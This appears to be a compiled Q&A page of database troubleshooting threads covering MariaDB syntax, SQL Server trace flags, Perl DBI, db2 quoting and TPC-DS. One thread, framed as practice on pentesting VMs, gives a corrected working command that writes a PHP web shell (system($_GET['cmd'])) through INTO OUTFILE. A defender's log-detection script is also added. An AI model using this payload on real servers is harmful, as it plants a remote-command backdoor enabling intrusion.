#1064 - You have an error in your SQL syntax in phpMyadmin - sql

I built the following query for MySQL, on MariaDB, phpMyAdmin version 4.8.3:
Database server
Server: 127.0.0.1 via TCP/IP
Server type: MariaDB
Server connection: SSL is not being used
Server version: 10.1.36-MariaDB - mariadb.org binary distribution
Protocol version: 10
Web server
Apache/2.4.34 (Win32) OpenSSL/1.1.0i PHP/7.2.10
Database client version: libmysql - mysqlnd 5.0.12-dev - 20150407 - $Id: 38fea24f2847fa7519001be390c98ae0acafe387 $
PHP extension: mysqli curl mbstring
PHP version: 7.2.10
SQL
SELECT tblhoadon.MaHoaDon,
tblkhachhang.HoVaTen,
tblphongtro.MaSoPhong,
tblphongtro.GiaThue,
tbldichvu.MaDichVu,
tblchitietdv.TenChiPhi,
tblchitietdv.ThanhTien,
tblhoadon.TongTien
FROM tblhoadon,
tblphongtro,
tbldichvu,
tblchitietdv
WHERE tblhoadon.MaKhachHang = tblkhachhang.MaKhachHang,
tblhoadon.MaSoPhong = tblphongtro.MaSoPhong,
tblhoadon.MaDichVu = tbldichvu.MaDichVu,
tbldichvu.MaDichVu = tblchitietdv.MaDichVu LIKE 10040001
Report error
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use
near ' tblhoadon.MaSoPhong = tblphongtro.MaSoPhong, tblhoadon.MaDichVu
= tbldichvu.MaD' at line 1
Can you help me fix the syntax error?

You can't just have a series of conditions. You need some logical operator between them, such as AND or OR.
Additionally, the last condition has several issues:
LIKE should take a string argument, not a number.
You can't chain equalities like that; you should create two conditions with a logical AND operator between them.
While it's not strictly wrong to use LIKE without a wildcard, it's a bit pointless, and you can just use an = condition:
SELECT tblhoadon.MaHoaDon,
tblkhachhang.HoVaTen,
tblphongtro.MaSoPhong,
tblphongtro.GiaThue,
tbldichvu.MaDichVu,
tblchitietdv.TenChiPhi,
tblchitietdv.ThanhTien,
tblhoadon.TongTien
FROM tblhoadon,
tblkhachhang, -- required: the SELECT list and WHERE clause reference this table
tblphongtro,
tbldichvu,
tblchitietdv
WHERE tblhoadon.MaKhachHang = tblkhachhang.MaKhachHang AND
tblhoadon.MaSoPhong = tblphongtro.MaSoPhong AND
tblhoadon.MaDichVu = tbldichvu.MaDichVu AND
tbldichvu.MaDichVu = tblchitietdv.MaDichVu AND
tblchitietdv.MaDichVu = '10040001'

Related

Turning on Trace Flag 460 does not give a better error message

I have a large insert query which ends in an error:
Msg 8152, Level 16, State 4, Line 1
String or binary data would be truncated
After some research I tried using TRACE FLAG 460, using the command below:
INSERT...
VALUES...
OPTION (QUERYTRACEON 460);
This gave the same error as before, so I tried to turn on the flag on server-level, using the command below:
DBCC TRACEON(460, -1);
Again, no change in the output. But when I check the flag status it gives all the right information:
DBCC TRACESTATUS(460);
TraceFlag Status Global Session
460 1 1 0
Does anyone have a clue how I can get Trace Flag 460 working? My server information is down below:
Edition: Developer Edition (64-bit)
ProductVersion: 14.0.2037.2
ResourceLastUpdateDateTime: 2020-11-02 21:20:26.783
ResourceVersion: 14.00.2037
BuildClrVersion: v4.0.30319
Have you checked the documentation??
It clearly says:
Note: This trace flag applies to SQL Server 2017 (14.x) CU12 and higher builds
Which means SQL Server 2017 has to have a build version number of 14.0.3045.24 or higher - which you don't seem to have.
So you'll need to install at least CU12 (or better yet: the latest CU22 - https://www.microsoft.com/en-us/download/details.aspx?id=56128) on your machine for this to work
See: SQL Server 2017 build versions - for all the details about the official version numbers of SQL Server 2017 (and its various CUs)

Connecting to SQL Server using Perl using DBI?

I am trying to connect to SQL Server using the Perl DBI module. I have tried all the connection string formats, but Perl is still throwing an invalid connection string error.
I have already tried the code snippet available on the PerlMonks website.
#!/usr/bin/perl -w
use strict;
use DBI;
# Set up variables for the connection
my $server_name = '00.120.124.1;3181';
my $database_name = 'abcd';
my $database_user = 'kkkk';
my $database_pass = 'password';
my $DSN = 'driver={SQL Server};server=$server_name;da
+tabase=$database_name;uid=$database_user;pwd=$database_pass;';
my $dbh = DBI->connect("DBI:ODBC:$DSN") || die "Couldn't open database
+: $DBI::errstr\n";
Expected result is to connect to Database.
failed: [Microsoft][ODBC SQL Server Driver][DBNETLIB]SQL Server does not exist or access denied. [Microsoft][ODBC SQL Server Driver][DBNETLIB]ConnectionOpen (Connect()). (SQL-01000) [state was 01000 now 01S00] [Microsoft][ODBC SQL Server Driver]Invalid connection string attribute (SQL-01S00) at perl.pl line 16. Couldn't open database +: [Microsoft][ODBC SQL Server Driver][DBNETLIB]SQL Server does not exist or access denied. (SQL-08001) [state was 08001 now 01000] Invalid connection string attribute (SQL-01S00)
The lines of your post that begin with +
+tabase=$database_name;uid=$database_user;pwd=$database_pass;';
+: $DBI::errstr\n";
were incorrectly copied and pasted from perlmonks.org. The leading + sign is a convention that indicates a long line was split. You should delete the + and join the line to the previous line, so that your code will read
my $DSN = 'driver={SQL Server};server=$server_name;database=$database_name;uid=$database_user;pwd=$database_pass;';
my $dbh = DBI->connect("DBI:ODBC:$DSN") || die "Couldn't open database: $DBI::errstr\n";
Your error message contains the following:
SQL Server does not exist or access denied
Your set-up code contains the following:
my $server_name = '00.120.124.1;3181';
'00.120.124.1;3181' is not a valid server name or IP address. You should correct the IP address section (it can't start with '00') and remove the port into a separate parameter.
You also have the username and password as part of your DSN. I don't know if DBD::ODBC supports that usage (it's not mentioned in the documentation) but it's more traditional to have those as separate parameters to the connect() call.
All in all, I think you want something more like this:
my $server_name = '00.120.124.1'; # But this needs to be corrected
my $server_port = 3181;
my $database_name = 'abcd';
my $database_user = 'kkkk';
my $database_pass = 'password';
my $DSN = "driver={SQL Server};server=$server_name;port=$server_port;database=$database_name";
my $dbh = DBI->connect("DBI:ODBC:$DSN", $database_user, $database_pass)
|| die "Couldn't open database: $DBI::errstr\n";
Also note that I've changed the quote characters used to create your $DSN variable from single quotes to double quotes. Variables are not expanded in single quotes, so you weren't getting the values of $server_name, etc. in your DSN.
The better way to connect is with the DBD::Sybase module. The name wouldn't suggest it but SQL Server takes its lineage from Sybase. That way you can avoid ODBC. http://metacpan.org/pod/DBD::Sybase#Using-DBD::Sybase-with-MS-SQL

php code injection in phpmyadmin

I'm toying with some pentesting VMs, and I'm trying a shell upload in phpmyadmin.
The tutorial I'm trying to follow is http://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/
The question I have however is pure SQL - the command I'm trying to use:
SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”
is producing the following error:
Error
There seems to be an error in your SQL query. The MySQL server error output below, if there is any, may also help you in diagnosing the problem
ERROR: Unknown Punctuation String # 9
STR: <?
SQL: SELECT “<?php system($_GET[‘cmd’]);SELECT “<?php system($_GET[‘cmd’]);SELECT “<?php system($_GET[‘cmd’]);
SQL query:
SELECT “<?php system($_GET[‘cmd’]);
MySQL said:
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?php system($_GET[‘cmd’])' at line 1
Any ideas how could I format it to be accepted?
The quotes were copied dirty. Replace them after pasting the snippet:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php";
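From the defender's side, a statement like the one in this thread stands out in query logs. The following added example (not part of the original posts) filters log lines for `INTO OUTFILE` / `INTO DUMPFILE` writes whose target has a server-side script extension; the log lines, the extension list and the function names are constructed for illustration.

```bash
# Flag SQL statements that write a server-side script through
# SELECT ... INTO OUTFILE/DUMPFILE. Reads log lines on stdin and prints
# the matching ones. Extension list is an assumption; extend as needed.
q="[\"']"   # either ASCII quote character around the target path
pattern="into[[:space:]]+(outfile|dumpfile)[[:space:]]+${q}[^\"']*\\.(php[0-9]?|phtml|phar|jsp|aspx?)${q}"

flag_outfile_writes() {
    # -i: SQL keywords and file extensions are case-insensitive here.
    # '|| true' keeps "no match" from being treated as a failure.
    grep -Ei -- "$pattern" || true
}

# Constructed sample lines in the style of a MySQL general query log.
sample_log() {
    cat <<'EOF'
2019-01-01T10:00:01Z 12 Query SELECT * FROM tblhoadon WHERE MaHoaDon = 1
2019-01-01T10:00:05Z 12 Query SELECT "<?php /* payload elided */ ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
2019-01-01T10:00:09Z 13 Query SELECT MaHoaDon FROM tblhoadon INTO OUTFILE '/var/backups/hoadon.csv'
2019-01-01T10:00:12Z 14 Query select 1 INTO DUMPFILE '/var/www/html/x.PHP'
EOF
}

hits=$(sample_log | flag_outfile_writes)
hit_count=$(printf '%s\n' "$hits" | grep -c .)

# Lines 2 and 4 are reported; the CSV export on line 3 is not.
printf '%s\n' "$hits"
```

The same statement is refused by the server when the account lacks the FILE privilege or when secure_file_priv confines exports to a directory outside the web root.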

Running db2 from bash script not working?

I'm currently using bash on CentOS. DB2 is installed and db2 is on my path.
I have a few lines in a script which are supposed to update my db2 database, but they aren't working. As a minimal reproduction, I can do the exact same thing right in the bash command line and get the same error. Here's that reproduction:
$ db2 connect to PLT02345 user uni using uni; db2 update USM_USER set STATUS = 1 where NAME = 'asm_admin'
I expect this to set STATUS to 1 for everything in PLT02345.USM_USER where the NAME is currently asm_admin.
Instead, I get an error about "ASM_ADMIN" not being valid in the context where it's used. Here's the full output:
Database Connection Information
Database server = DB2/LINUXX8664 10.1.2
SQL authorization ID = UNI
Local database alias = PLT02345
DB21034E The command was processed as an SQL statement because it was not a
valid Command Line Processor command. During SQL processing it returned:
SQL0206N "ASM_ADMIN" is not valid in the context where it is used.
SQLSTATE=42703
I'm confused - what about this makes it not valid? Is bash somehow mutilating the command and not passing everything as it should to db2?
If you're running this from the command line, Bash will drop the 's off 'asm_admin' because it simply assumes you're passing a string. The end result is the SQL becoming WHERE name = asm_admin which is invalid.
To correct this, you need to quote your whole command:
db2 "update USM_USER set STATUS = 1 where NAME = 'asm_admin'"
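The quoting behaviour described in the answer above, as an added example that is not part of the original posts: `joined_args` is a hypothetical stand-in for `db2` that returns its arguments exactly as the shell delivered them. Going one step beyond the answer, the hypothetical helpers `sql_literal` and `build_update` embed a shell variable in the quoted statement by doubling single quotes; the name `o'brien` is a constructed sample.

```bash
# Stand-in for a CLI such as db2 that joins its arguments into one statement.
# Hypothetical helper: it only returns what the shell actually hands over.
joined_args() {
    printf '%s' "$*"
}

# Escape a value for use inside a single-quoted SQL string literal by
# doubling every embedded single quote (standard SQL escaping).
sql_literal() {
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/''/g")"
}

# Build the UPDATE from the question for a name held in a shell variable.
build_update() {
    printf 'update USM_USER set STATUS = 1 where NAME = %s' "$(sql_literal "$1")"
}

# 1. Unquoted: bash removes the single quotes before the program runs,
#    so the SQL parser sees a column name instead of a string literal.
unquoted=$(joined_args update USM_USER set STATUS = 1 where NAME = 'asm_admin')

# 2. Whole statement in double quotes: the inner single quotes survive.
quoted=$(joined_args "update USM_USER set STATUS = 1 where NAME = 'asm_admin'")

# 3. Value taken from a variable (constructed sample containing a quote).
from_var=$(joined_args "$(build_update "o'brien")")

printf '%s\n' "$unquoted" "$quoted" "$from_var"
```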

How to generate executable TPC-DS queries?

I have downloaded the DSGEN tool from the TPC-DS web site and already generated the tables and loaded the data into Oracle XE.
I am using the following command to generate the SQL statements:
dsqgen -input ..\query_templates\templates.lst -directory ..\query_templates -dialect oracle -scale 1
However, no matter how I adjust the command I always get this error message:
ERROR: A query template list must be supplied using the INPUT option
Can anybody help?
Apparently you need to use / rather than - for the flags for the Windows executable:
dsqgen /input ..\query_templates\templates.lst /directory ..\query_templates /dialect oracle /scale 1